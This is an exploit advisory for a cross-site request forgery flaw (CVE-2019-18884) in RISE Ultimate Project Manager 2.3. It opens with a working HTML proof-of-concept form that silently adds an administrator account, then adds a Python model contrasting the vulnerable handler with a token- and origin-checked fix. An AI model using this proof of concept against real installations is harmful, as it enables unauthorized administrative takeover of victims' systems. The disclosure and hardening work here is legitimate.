RISE Ultimate Project Manager 2.3 Cross Site Request Forgery

Related Vulnerabilities: CVE-2019-18884  
Publish Date: 12 Nov 2019

                # Exploit Title: RISE - Ultimate Project Manager v2.3 - Cross-Site Request Forgery (Add Admin)
# Date: 11-11-2019
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: http://fairsketch.com/
# Software Link : https://codecanyon.net/item/rise-ultimate-project-manager/15455641
# Software : RISE - Ultimate Project Manager
# Product Version:  Version 2.3
# Vulnerability Type : Cross-Site Request Forgery
# Vulnerability : Cross-Site Request Forgery (Add Admin)
# CVE : CVE-2019-18884

# index.php/team_members/add_team_member in RISE Ultimate Project Manager v2.3 accepts a POST that creates a team member without any anti-CSRF token, so a logged-in administrator who loads an attacker-controlled page will silently add a new user; with role=1 the new user is an administrator.

# CSRF PoC :

<html>
  <body>
  <!-- Trims the Referer to the page origin so the full attacker URL is not leaked to the target -->
  <script>history.pushState('', '', '/')</script>
    <form action="http://rise.fairsketch.com/index.php/team_members/add_team_member" method="POST">
      <input type="hidden" name="first_name" value="Ismail" />
      <input type="hidden" name="last_name" value="Tasdelen" />
      <input type="hidden" name="address" value="ismailtasdelen@protonmail.com" />
      <input type="hidden" name="phone" value="+12345678975" />
      <input type="hidden" name="gender" value="male" />
      <input type="hidden" name="job_title" value="Security Researcher" />
      <input type="hidden" name="salary" value="100000" />
      <input type="hidden" name="salary_term" value="12" />
      <input type="hidden" name="date_of_hire" value="2019-11-11" />
      <input type="hidden" name="email" value="ismailtasdelen@protonmail.com" />
      <input type="hidden" name="password" value="iQ.grF10" />
      <!-- role=1 creates the account with administrator privileges -->
      <input type="hidden" name="role" value="1" />
      <input type="hidden" name="email_login_details" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
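# Added example (not from the advisory and not RISE's own code): a minimal model of the
# add_team_member handler, first as the advisory describes it (session cookie only, no
# anti-CSRF check) and then hardened with a synchronizer token plus Origin/Referer
# validation. The Request/Session types, the trusted origin, the attacker origin and the
# token field name are assumptions for the demonstration; the form fields are the PoC's.

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, List, Optional

TRUSTED_ORIGIN = "http://rise.example.test"  # assumed: origin the app is served from
ADD_PATH = "/index.php/team_members/add_team_member"  # path from the advisory
CSRF_FIELD = "csrf_token"  # assumed form-field name for the synchronizer token


@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str]
    form: Dict[str, str]


@dataclass
class Session:
    """Server-side session resolved from the victim's cookie (assumed shape)."""
    user_id: int
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(32))


def _create_member(req: Request, users: List[dict]) -> int:
    users.append({"email": req.form["email"], "role": req.form["role"]})
    return 200


def add_team_member_vulnerable(req: Request, session: Optional[Session], users: List[dict]) -> int:
    """As in the advisory: an authenticated session is all that is checked, so a
    forged cross-site POST carrying the victim's cookie succeeds."""
    if req.method != "POST" or req.path != ADD_PATH:
        return 404
    if session is None:
        return 401
    return _create_member(req, users)


def csrf_check(req: Request, session: Session) -> bool:
    """Synchronizer token bound to the session, plus an Origin/Referer check.
    A browser sets Origin/Referer itself; attacker page scripts cannot forge the host."""
    origin = req.headers.get("Origin")
    referer = req.headers.get("Referer")
    if origin is not None:
        if origin != TRUSTED_ORIGIN:
            return False
    elif referer is not None:
        if not referer.startswith(TRUSTED_ORIGIN + "/"):
            return False
    else:
        return False  # state-changing POST with neither header: reject
    submitted = req.form.get(CSRF_FIELD, "")
    return hmac.compare_digest(submitted, session.csrf_token)  # constant-time compare


def add_team_member_hardened(req: Request, session: Optional[Session], users: List[dict]) -> int:
    if req.method != "POST" or req.path != ADD_PATH:
        return 404
    if session is None:
        return 401
    if not csrf_check(req, session):
        return 403
    return _create_member(req, users)


# The hidden fields of the advisory's PoC form.
POC_FIELDS = {
    "first_name": "Ismail", "last_name": "Tasdelen",
    "address": "ismailtasdelen@protonmail.com", "phone": "+12345678975",
    "gender": "male", "job_title": "Security Researcher", "salary": "100000",
    "salary_term": "12", "date_of_hire": "2019-11-11",
    "email": "ismailtasdelen@protonmail.com", "password": "iQ.grF10",
    "role": "1", "email_login_details": "1",
}


def forged_request() -> Request:
    """What the victim's browser sends when it submits the PoC (constructed): the
    session cookie rides along, but there is no token and Origin is the attacker's."""
    headers = {"Origin": "http://attacker.example", "Referer": "http://attacker.example/"}
    return Request("POST", ADD_PATH, headers, dict(POC_FIELDS))


def legitimate_request(session: Session) -> Request:
    """Same form submitted from the real UI: same-origin and carrying the session token."""
    form = dict(POC_FIELDS)
    form[CSRF_FIELD] = session.csrf_token
    return Request("POST", ADD_PATH, {"Origin": TRUSTED_ORIGIN}, form)


def demo() -> dict:
    session = Session(user_id=1)  # the logged-in administrator
    vuln_users: List[dict] = []
    hard_users: List[dict] = []
    return {
        "vulnerable_poc": add_team_member_vulnerable(forged_request(), session, vuln_users),
        "vulnerable_admins": [u for u in vuln_users if u["role"] == "1"],
        "hardened_poc": add_team_member_hardened(forged_request(), session, hard_users),
        "hardened_legit": add_team_member_hardened(legitimate_request(session), session, hard_users),
        "hardened_users": len(hard_users),
    }


if __name__ == "__main__":
    print(demo())
```

Against the vulnerable handler the forged POST returns 200 and leaves a role=1 account behind; the hardened handler returns 403 for it and 200 for the same form submitted from the application's own page. The PoC's `history.pushState` only shortens the Referer path; it cannot change the Origin or Referer host, so the origin check still holds, and the per-session token closes the gap for clients that omit both headers. The session's cookie should additionally be marked `SameSite=Lax` or `Strict` so the browser never attaches it to such a cross-site POST in the first place.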